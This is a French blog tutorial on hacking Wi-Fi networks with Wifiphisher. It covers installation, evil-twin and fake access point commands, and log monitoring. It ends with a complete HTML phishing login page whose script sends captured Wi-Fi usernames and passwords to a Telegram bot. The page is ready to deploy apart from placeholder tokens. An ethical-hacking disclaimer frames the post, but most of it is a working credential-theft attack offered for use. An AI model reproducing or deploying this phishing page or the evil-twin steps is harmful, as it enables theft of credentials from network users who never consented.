Aujourd’hui, nous allons explorer comment pirater un réseau Wi-Fi à l’aide de pages de phishing et de la création d’un réseau factice. C’est parti !
Rappelons-nous : la loi est primordiale, et le respect des règles est nécessaire. Cela signifie que tout ce qui est décrit ci-dessous est uniquement à des fins de test et doit être effectué uniquement avec l’autorisation du propriétaire du réseau. Allons-y !
Chaque jour, de nouvelles méthodes pour pirater les réseaux Wi-Fi apparaissent, ce qui oblige les propriétaires à prêter davantage attention à leur sécurité. Un outil qui peut vous aider à vérifier les vulnérabilités de votre réseau Wi-Fi est Wifiphisher.
Wifiphisher – Qu’est-ce que c’est ?
Wifiphisher est une puissante bibliothèque open-source conçue pour tester la sécurité des réseaux Wi-Fi via des attaques d’ingénierie sociale. Découvrons comment cet outil fonctionne, quels scénarios il prend en charge et comment il peut être utilisé.
Principales fonctionnalités de Wifiphisher
- Création de points d’accès factices (Fake AP) :
Wifiphisher peut créer des réseaux Wi-Fi factices imitant les vrais. Cela permet de vérifier à quel point les utilisateurs sont enclins à se connecter à des réseaux non sécurisés. - Attaque Evil-Twin :
L’outil déconnecte les utilisateurs de leur réseau Wi-Fi actuel et les redirige vers un point d’accès factice où l’attaquant peut collecter des données. - Pages de phishing :
Wifiphisher permet de configurer des pages de connexion factices pour s’assurer que les utilisateurs ne saisissent pas leurs mots de passe sur des ressources non sécurisées. - Flexibilité dans la configuration :
La bibliothèque prend en charge différents modèles d’attaques et scénarios, qui peuvent être adaptés à des besoins spécifiques.
Comment installer Wifiphisher ?
L’installation de Wifiphisher est relativement simple, mais il est important de noter que l’outil ne fonctionne que sous Linux. Voici les étapes de base :
- Assurez-vous que Python 3 et le gestionnaire de paquets pip sont installés sur votre appareil.
- Clonez le dépôt Wifiphisher depuis GitHub :
git clone https://github.com/wifiphisher/wifiphisher.git
- Accédez au dossier du projet et installez les dépendances :
cd wifiphisher sudo python3 setup.py install
- Lancez l’outil :
sudo wifiphisher
Exemples d’utilisation de Wifiphisher
Scénario 1 : Vérification de la sécurité réseau contre les attaques Evil-Twin
- Lancez Wifiphisher avec l’option pour une attaque Evil-Twin :
sudo wifiphisher --essid "MyHomeWiFi" --channel 6
- Les utilisateurs connectés au réseau réel sont déconnectés et redirigés vers votre point d’accès factice.
- Configurez une page de phishing pour vous assurer que les utilisateurs ne saisissent pas leurs données sur des ressources non sécurisées. Par exemple, pour créer une page de connexion personnalisée, utilisez :
sudo wifiphisher --phishing-page-name "credentials"
Scénario 2 : Création d’un point d’accès factice ouvert
- Lancez Wifiphisher en mode Fake-AP :
sudo wifiphisher --essid "FreeWiFi" --channel 11
- Observez en temps réel combien d’utilisateurs se connectent à votre point d’accès factice en surveillant les journaux :
tail -f /var/log/wifiphisher.log
- Besoin d’une analyse plus détaillée des données collectées ? Utilisez les plugins intégrés :
sudo wifiphisher --plugin "plugin_name"
Scénario 3 : Interception de données via une page de phishing
En plus des modèles intégrés de Wifiphisher, vous pouvez créer votre propre page personnalisée pour intercepter les mots de passe. Voici un exemple de code HTML simple pour une page de connexion qui collecte les identifiants et les envoie à Telegram (vous pouvez trouver une instruction ici) :
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Wi-Fi Login</title> <style> body { font-family: Arial, sans-serif; text-align: center; margin-top: 50px; } .login-box { width: 300px; padding: 40px; border-radius: 10px; box-shadow: 0 0 15px rgba(0,0,0,0.2); background-color: #f1f1f1; margin: auto; } input[type="text"], input[type="password"] { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; } button { width: 100%; padding: 10px; background-color: #4CAF50; color: white; border: none; border-radius: 5px; cursor: pointer; } button:hover { background-color: #45a049; } </style> </head> <body> <div class="login-box"> <h2>Wi-Fi Login</h2> <form id="loginForm"> <input type="text" id="username" placeholder="Wi-Fi Username" required> <input type="password" id="password" placeholder="Wi-Fi Password" required> <button type="button" onclick="submitForm()">Submit</button> </form> </div> <script> function submitForm() { var username = document.getElementById('username').value; var password = document.getElementById('password').value; // Create a message to send to Telegram var message = "Captured data:\nUsername: " + username + "\nPassword: " + password; // Send data to Telegram via API var botToken = 'YOUR_BOT_TOKEN'; // Replace with your token var chatId = 'YOUR_CHAT_ID'; // Replace with your chat_id var url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`; // Send data using XMLHttpRequest var xhr = new XMLHttpRequest(); xhr.open('GET', url, true); xhr.send(); // Notify that data has been sent alert('Your data has been sent!'); } </script> </body> </html>
Conclusion
Il est important de comprendre que Wifiphisher est uniquement destiné au piratage éthique 🙂 L’utiliser pour tester des réseaux tiers sans l’autorisation du propriétaire est illégal. Cet outil a été conçu pour aider les experts en cybersécurité à identifier les vulnérabilités et à prévenir les attaques potentielles.
Merci pour votre attention. Comme toujours, si vous avez des questions, écrivez-moi à mon e-mail ou sur Telegram.
Support the Blog!
Running a blog takes a lot of effort, time, and passion. Your donations help improve the content, inspire new ideas, and keep the project going.
If you’ve enjoyed the blog’s materials, any support would mean the world to me. Thank you for being here! ❤️